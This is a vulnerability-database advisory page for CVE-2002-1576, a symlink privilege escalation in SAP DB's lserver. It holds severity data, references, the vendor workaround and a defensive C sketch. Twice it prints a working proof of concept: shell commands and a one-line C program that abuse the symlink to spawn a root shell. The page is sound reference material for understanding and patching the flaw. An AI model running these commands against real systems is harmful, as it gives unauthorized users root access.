CVE-2002-1576
CVSS 7.2
Published: 2004-04-15 00:00:00
Revised: 2016-10-17 22:27:16

[Original] lserver in SAP DB 7.3 and earlier uses the current working directory to find and execute the lserversrv program, which allows local users to gain privileges with a malicious lserversrv that is called from a directory that has a symlink to the lserver program.


[CNNVD] SAP DB local symbolic link vulnerability (CNNVD-200404-049)

        
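        SAP DB is a commercial database system.
        Because 'lserver' lacks sufficient integrity checks when it attempts to execute the 'lserversrv' program in the local directory, a local attacker can exploit this vulnerability through a symbolic link to escalate privileges.
        The 'lserver' program in SAP DB lacks proper handling when executing programs. An attacker can create a symbolic link in the 'lserver' directory that links to an 'lserversrv' binary containing malicious code; when 'lserver' is executed, the malicious 'lserversrv' in the current directory is executed through the symbolic link, and the arbitrary commands contained in 'lserversrv' are generally run with root privileges.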
        

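- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in a complete shutdown of the system]
Access complexity: LOW [no access restrictions for exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]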

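- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links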

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1576
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1576
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200404-049
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=103903565829796&w=2
(UNKNOWN)  BUGTRAQ  20021204 SAP database local root via symlink
http://www.sapdb.org/sap_db_alert.htm
(PATCH)  CONFIRM  http://www.sapdb.org/sap_db_alert.htm
http://www.securityfocus.com/bid/6316
(VENDOR_ADVISORY)  BID  6316
http://xforce.iss.net/xforce/xfdb/10762
(VENDOR_ADVISORY)  XF  sap-db-lserversrv-symlink(10762)

- Vulnerability information

SAP DB local symbolic link vulnerability
High risk   Other
2004-04-15 00:00:00 2005-10-20 00:00:00
Local
        
        

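- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * The SAP DB vendor provides the following temporary workaround: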
        # cd /pgm
        # cp lserversrv lserver
        # chown root lserver
        # chmod +s lserver
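        Vendor patch:
        SAP
        ---
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: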
        
        http://www.sap.com/

- Vulnerability information (22067)

SAP DB 7.3 .00 Symbolic Link Vulnerability (EDBID:22067)
unix local
2002-12-04 Verified
0 SAP Security
source: http://www.securityfocus.com/bid/6316/info

A vulnerability has been discovered in SAP DB that may allow an unprivileged user to execute commands with root privileges. The vulnerability is due to insufficient sanity checks by lserver when attempting to execute the 'lserversrv' binary in the current directory.

An attacker can exploit this vulnerability by creating a symbolic link to the 'lserver' binary in a directory containing a maliciously created 'lserversrv' binary. Executing lserver via the symbolic link will cause the malicious 'lserversrv' program in the current directory to be executed.

cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
./lserver		

- Vulnerability information

14554
SAP DB lserver Path Subversion Privilege Escalation

- Vulnerability description

Unknown or Incomplete

- Timeline

2002-12-04 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

SAP DB Symbolic Link Vulnerability
Origin Validation Error 6316
No Yes
2002-12-04 12:00:00 2009-07-11 07:16:00
This vulnerability was first detailed in a SAP Security Advisory.

- Affected program versions

SAP DB 7.3 .00

- Vulnerability discussion

A vulnerability has been discovered in SAP DB that may allow an unprivileged user to execute commands with root privileges. The vulnerability is due to insufficient sanity checks by lserver when attempting to execute the 'lserversrv' binary in the current directory.

An attacker can exploit this vulnerability by creating a symbolic link to the 'lserver' binary in a directory containing a maliciously created 'lserversrv' binary. Executing lserver via the symbolic link will cause the malicious 'lserversrv' program in the current directory to be executed.
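
A defensive sketch of the missing check, added here as an example (it is not SAP DB code and not from the advisory): a privileged launcher opens its helper from a fixed absolute directory instead of the current working directory, and verifies ownership and permissions on the opened file before executing it. The function name `open_trusted_helper` and the owner/mode policy are assumptions; the directory in `main` is the install path that appears on this page.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 if the object is owned by `owner` and not writable by group or others. */
static int owner_only(const struct stat *st, uid_t owner) {
    return st->st_uid == owner && (st->st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Open helper `name` from the fixed absolute directory `dir`, never from the
 * current working directory. Returns an fd for fexecve(), or -1 on failure. */
int open_trusted_helper(const char *dir, const char *name, uid_t owner) {
    struct stat st;
    int dfd, fd;

    if (dir[0] != '/' || name[0] == '\0' || strchr(name, '/'))
        return -1;                      /* no relative dirs, no path tricks */
    dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    if (fstat(dfd, &st) != 0 || !owner_only(&st, owner)) {
        close(dfd);                     /* others could plant files here */
        return -1;
    }
    fd = openat(dfd, name, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    close(dfd);
    if (fd < 0)
        return -1;                      /* missing, or a symlink (ELOOP) */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        !(st.st_mode & S_IXUSR) || !owner_only(&st, owner)) {
        close(fd);
        return -1;
    }
    return fd;                          /* checks apply to this exact file */
}

int main(void) {
    /* Assumed install directory, taken from the path used on this page. */
    int fd = open_trusted_helper("/usr/sapdb/depend/pgm", "lserversrv", 0);
    printf("lserversrv %s\n", fd >= 0 ? "passed checks" : "rejected");
    if (fd >= 0) close(fd);
    return fd >= 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
```

Executing the returned descriptor with `fexecve()` rather than re-resolving the path keeps the file that was checked and the file that runs identical.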

- Exploit

The following proof of concept was provided by KF:

cd /tmp
mkdir "snosoft+sapdb=root"
cd "snosoft+sapdb=root"
ln -s /usr/sapdb/depend/pgm/lserver lserver
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > root.c
cc -o root root.c
cp root lserversrv
./lserver

- Solution

The vendor has stated the following:

Perform the following steps for each <dependent_path>:

$ cd <dependent_path>/pgm
$ cp lserversrv lserver
$ chown root lserver
$ chmod +s lserver
